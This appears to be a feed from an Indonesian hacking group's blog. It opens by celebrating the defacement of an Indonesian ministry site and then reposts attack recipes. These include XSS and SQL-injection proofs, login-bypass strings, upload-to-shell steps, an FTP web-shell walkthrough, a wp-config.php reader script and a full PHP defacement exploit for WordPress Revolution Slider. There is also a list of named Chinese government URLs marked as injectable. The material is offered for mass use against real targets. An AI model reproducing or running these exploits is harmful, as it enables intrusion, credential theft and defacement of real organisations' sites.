Kemdikbud di hajar Hacker Pagi ini!

Pada hari Rabu, 27 Mei 2015 pukul 09.42 Situs Kementerian Pendidikan dan Kebudayaan Republik Indonesia Direktorat Jenderal Pendidikan Anak Usia Dini, Nonformal dan Informal di hajar Hacker atas nama grup Java Intelegent Cyber dan Banten Cyber Attacker Team ( Memberal_Force & Gurita4Cyber )

Message To Indonesia Government ~!~
Kami Ingin mempertanyakan dimana keuangan Negara? dan kemanakah Hukum dan HAM yang berlaku?
apa Itu hanya omong kosong? Sebanyak 75 Persen Sekolah di Indonesia Tak Penuhi Standar ! Rakyat indonesia hanya butuh action dan perhatian dari pemerintah ! Bukan hanya OMONG BESAR! dan untuk anda, Presiden Indonesia, Ir. H. Joko Widodo Kami juga mempertanyakan kemana janji" anda?!? Rakyat menjerit, semua kebutuhan naik. HUKUM hanya seperti paku, yang tajam ke bawah dan tumpul ke atas! Kembali ke system Demokrasi yang dari rakyat oleh rakyat dan untuk rakyat
apakah itu sudah tidak berlaku di negeri yang penuh kebohongan dan permainan ini?
Korupsi Merajalela, Merampas semua uang rakyat, hingga saat ini, Banyak rakyat Indonesia yang hidup dalam kemiskinan.
Kami harap, Pemerintah bisa lebih tegas dalam menerapkan Hukum, Bertindak tegas untuk membangun pendidikan Indonesia Yang lebih maju, dan Mengelola tanah indonesia sebaik-baik nya, Tidak seperti di pertambangan emas di papua, migas di blok cepu, dan sebagainya. Rakyat hanya bisa melihat orang orang asing merauk keuntungan yang besar dari tanah negara indonesia. Semoga indonesia bisa menjadi lebih baik,

begitulah pesan yang di sampaikan hacker itu dalam halaman deface page nya. Sampai saat ini, Situs itu masih dikuasi Hacker dan di duga situs itu telah di tanam akses root dan Shell,.
Memberal_Force juga pernah meretas situs Christian School ~> http://www.christiantoday.com/article/fbi.probes.hacking.of.christian.school.website/50181.htm

Semoga Pemerintah Indonesia Peka terhadap pesan yang di sampaikan hacker ini ^_^ ini juga demi kebaikan negara indonesia :)


src: Banten Cyber Attacker Team

20:07  Java Intelegent Cyber  No comments

Read More

ATOMYMAXSITE CMS Multiple Vulnerability

# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"

# Date: 5/05/2015

# Tested on: Kali Linux

Interductions:



ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.





Cross Site Scripting (Refelected)

-========================================



An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :



Poc:



http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E



GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1

Host: www.pck1.go.th

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95

Connection: keep-alive

HTTP/1.1 200 OK

Date: Tue, 05 May 2015 10:35:21 GMT

Server: Apache/2.2.22 (Ubuntu)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 10728

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=tis-620





Sql Injection

=============================



In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases



And Collect All Usernames And Passwords .



PoC:



http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]

Sumber : http://www.exploit4arab.net 

19:56  Java Intelegent Cyber  1 comment

Read More

boomchat-v4.2 Upload Vulnerability

| # Dork     : no 4 noob

| # Tested on: Win8 fr pro

| # Bug      : Upload

| # Download : www.20script.ir

=======================================

1- register in script 4 chat

2- change photo of profil

3- chang evil from 1.php to 1.php.jpg

4- go to http://127.0.0.1/bmchat/avatar/peter85467529.php

Sumber: http://www.exploit4arab.net/ 

19:53  Java Intelegent Cyber  1 comment

Read More

Macro Info Solution Bypass

Dork : Powered By : Macro Info Solutions

Poc :

http://www.target.com/admin/



Username : ' or 1=1 limit 1 -- -+

Password : ' or 1=1 limit 1 -- -+
 

Salam ./51N1CH1 :) 

sumber : http://www.exploit4arab.net/

19:49  Java Intelegent Cyber  1 comment

Read More

Wordpress Revolution Slider

#!/bin/bash
# EXPLOIT COMPLEMENTO SCANNER INURLBR:
# ./inurlbr.php --dork 'admin-ajax.php?action=revolution'  -s revolution.txt -q 1,6 [...]
#  --comand-all 'bash script.sh "http://_TARGET_" "/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php"'
 
# Exemple: bash script.sh http://target.br you_exploit
# Exec:    bash script.sh http://target.gov.br '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
 
curl -s "$1$2" | grep 'DB_' > /dev/null && echo "[+] $1$2" | tee -a /output/wp-out-curl.txt || echo not vuln;
 
sumber:pastebin

19:11  Java Intelegent Cyber  1 comment

Read More

List Vuln web Gov.cn POC SQLI

http://www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
http://www.hnsqjgdj.gov.cn/node.php?tid=849?'´0x27
www.hnsqjgdj.gov.cn/node.php?tid=849?'´0x27
http://www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3238?'´0x27
www.hnsqjgdj.gov.cn/article_news.php?aid=3238?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
http://www.bsqy.gov.cn/xwzx.class.php?'´0x27
www.bsqy.gov.cn/xwzx.class.php?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
http://www.sipqts.gov.cn/nami/web/index.php/product/35ee0e89be8d0805dca6da9f441a15c0/?'´0x27
http://www.hnsqjgdj.gov.cn/list_news.php?tid=&page=1?'´0x27
www.hnsqjgdj.gov.cn/list_news.php?tid=
http://www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
http://www.shzqx.gov.cn/data/aws/daily.php?station=Y4147&time=201310&query=查询&prev=上一页&next=下一页?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=381&channelid=&channel=&type=&typeid=
www.tanbu.gov.cn/govAffairsDetails.php?newsid...?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
http://old.gl.gov.cn/xzffdt/catalog.php?catalogid=34?'´0x27
http://www.nbjdda.gov.cn/plus/docs.php?typeid=236&skey=&stype=236&adv=a&ss_x=&totalresult=10?'´0x2796&pageno=10?'´0x27
http://www.lytgb.gov.cn/newsInfo.php?nid=28?'´0x275&parent_id=8?'´0x27
www.lytgb.gov.cn/newsInfo.php?nid=285?'´0x27
http://www.lytgb.gov.cn/newsInfo.php?nid=290&parent_id=8?'´0x27
www.lytgb.gov.cn/newsInfo.php?nid=290?'´0x27
http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=招商局赴上海开展招商活动?'´0x27
http://www.lytgb.gov.cn/plistinfo.php?nid=351&parent_id=41?'´0x27
www.lytgb.gov.cn/plistinfo.php?nid=351?'´0x27
http://www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27
www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27
http://www.hnsqjgdj.gov.cn/list_news.php?tid=844?'´0x27
www.hnsqjgdj.gov.cn/list_news.php?tid=844?'´0x27
http://www.hflyw.gov.cn/photo/class/?9.html?'´0x27
www.hflyw.gov.cn/photo/class/?9.html?'´0x27
http://www.hfxly.gov.cn/news/class/?86.html?'´0x27
www.hfxly.gov.cn/news/class/?86.html?'´0x27
http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=保税区工商分局在全市工商系统注册管理知识竞赛中获佳绩?'´0x27
http://www.tanbu.gov.cn/investDetails.php?newsid=1?'´0x27
http://www.hnsqjgdj.gov.cn/node.php?tid=3242?'´0x27
www.hnsqjgdj.gov.cn/node.php?tid%...?'´0x27
http://www.zjcxrc.gov.cn/main/viewCompany?code=4624:?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3241?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3239?'´0x27
http://www.hnsqjgdj.gov.cn/article_news.php?aid=3254?'´0x27
http://www.bsqy.gov.cn/xwzx.class.php?'´0x27
www.bsqy.gov.cn/xwzx.class.php?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=383?'´0x27
http://www.hnsqjgdj.gov.cn/list_news.php?tid=&page=1?'´0x27
http://www.sipqts.gov.cn/nami/web/index.php/product/35ee0e89be8d0805dca6da9f441a15c0/?'´0x27
http://www.tanbu.gov.cn/investVideos.php?typeid=159?'´0x27
http://www.shzqx.gov.cn/data/aws/daily.php?station=Y4147&time=201310&query=查询&prev=上一页&next=下一页?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=370?'´0x27
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=381&channelid=&channel=&type=&typeid=
http://www.tanbu.gov.cn/govAffairsDetails.php?newsid=382?'´0x27
http://www.nbjdda.gov.cn/plus/docs.php?typeid=236&skey=&stype=236&adv=a&ss_x=&totalresult=10?'´0x2796&pageno=10?'´0x27
http://old.gl.gov.cn/xzffdt/catalog.php?catalogid=34?'´0x27
http://www.lytgb.gov.cn/newsInfo.php?nid=28?'´0x275&parent_id=8?'´0x27
http://www.lytgb.gov.cn/newsInfo.php?nid=290&parent_id=8?'´0x27
http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=财政局举办财税政策座谈会?'´0x27
http://ldap.nftz.gov.cn/~test/nftzoa_v3/nftzoa/subsystem/onlinenews/readfiledoc.php?docadd=招商局赴上海开展招商活动?'´0x27
http://www.lytgb.gov.cn/newsInfo.php?nid=223&parent_id=8?'´0x27
http://www.lytgb.gov.cn/plistinfo.php?nid=351&parent_id=41?'´0x27
www.lytgb.gov.cn/plistinfo.php?ni...?'´0x27
http://www.mjxzjj.gov.cn/LeaderInfo.php?pid=75?'´0x27

18:48  Java Intelegent Cyber  1 comment

Read More

Priv8 Exploit Upload Shell Via FTP CMD (Joomla)

- Author: CoderSec
- Date: 25/07/2014
- Tested on : Windows

Dork:

inurl:/download.php?file=

inurl:/force-download.php?file=

Explorer ur brain

 

Get Database :

ww.site.com/download.php?file=configuration.php

ww.site.com/force-download.php?file=configuration.php

 

Find FTP User And FTP Password On Database :

var $Ftp_User : 'user'

var $Ftp_pass : 'user'

var $Ftp_root : 'public_html'

 

Upload Shell via FTP CMD

1. Open CMD

Example :

C:\Documents and Settings\USER> ftp site.com

to www.site.com

Connected to site.com

username : user

331 Password Required for example

Password : password

user Loged in

ftp> ls

public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )

ftp>cd public_html

ftp> put "C:\CoderSec.php" << shell

Command Success

File Transfered

 

Shell Access :

 

www.site.com/CoderSec.php

 

Live Target :

 

http://hisardoot.co.il/ISD/knife%20..%20configuration.php

 

Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg

18:26  Java Intelegent Cyber  1 comment

Read More

miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

# Vendor:        http://www.spyka.net/scripts/php/miniblo

 

  # Google Dork:   intext:"Powered by miniblog" ext:php

 

  # POC:           http://{YOU_URL}/adm/admin.php?mode=add

 

  # SEND REQUEST POST

  adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add

  ------------------------------------------------------------------------------

 

  # EXECUTE:       php xpl.php -t http://target.us

 

  # FILE_OUTPUT :  miniblog_vuln.txt

 

  # EXPLOIT MASS USE SCANNER INURLBR

  php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

  ------------------------------------------------------------------------------

 

 

 */

ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL

 

sumber: Pastebin

18:24  Java Intelegent Cyber  1 comment

Read More

Wordpress Revolution Slider Exploit 2015

<?php

set_time_limit(0);
error_reporting(0);



print '

[*]==============================================================[*]

[+] Tool : Wordpress Revolution Slider Exploit 2015

[+] Coded By : s0w

[*] You Should Change The Hacker Nickname View => ( $indexName ) ..

[@] Used: php rev.php http://www.target.com

[*]==============================================================[*]

';


$site = $argv[1];


/* your index name => */ $indexName = '51N1CH1';


$karem = @file_get_contents("$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css");
$path = "$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";



if (isset($argv[1])){

   

echo "Exploit & Scan Working !"."\n";



   
$post = array



(


"action" => "revslider_ajax_action",


"client_action" => "update_captions_css",


"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked By $indexName<br><p style='color: transparent'>"


);


$ch = curl_init ($site."/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);   

   

if (eregi("Hacked By",$karem)){

   

echo "\n"."\n";



echo "[+] Exploit Done [+]"."\n", $path;



echo "\n"."\n";

}else{

 

echo "[-] Exploit Failed ! [-]";

 

}   

   

}


// Finish Coded by s0w | Egyptian Shell Team //  


?>

18:15  Java Intelegent Cyber  1 comment

Read More

deface phpBugTracker 1.7.5 Mulllti Vulnerability

 # Title    : phpBugTracker 1.7.5 Mulllti Vulnerability

 # Author   : indoushka

 # email    : indoushka4ever@gmail.com

 # Dork     : Maian Gallery v2.0. Copyright © 2006-2015 Maian Script World. All Rights Reserved

 # Tested on: Win 8.1 fr pro / 22:15 * 15/05/2015

 # Bug      : Mulllti

 # Download : https://github.com/a-v-k/phpBugTracker

By Pass Admin Panel :



http://127.0.0.1/phpBugTracker/admin/configure.php



SQL injection :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=1 ( inject her )



( XSS / HTML Inject ) :



http://127.0.0.1/phpBugTracker/query.php?op=doquery&status[]=3%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E 

18:07  Java Intelegent Cyber  1 comment

Read More

Deface dengan Behsamanco Cms File Upload Vulnerability

Hai Sobat hehe maaf jarang Post lagi di blog karena sibuk di grup/team JIC family .. oke tanpa basa basi ane kasih cara Deface dengan Behsamanco Cms File Upload Vulnerability silahkan simak :)

 Dork : inurl:Repositary/RadEditor/SentDoc/Guest/

Exploit : site.com/Pages/Admin/CKEditor/DocumentManager.aspx

Letak Shell Anda : site.com/Repositary/RadEditor/SentDoc/Guest/filename.txt

Salam ./51N1CH1 :) Java Intelegent Cyber

Sumber: http://www.exploit4arab.net/

17:57  Java Intelegent Cyber  1 comment

Read More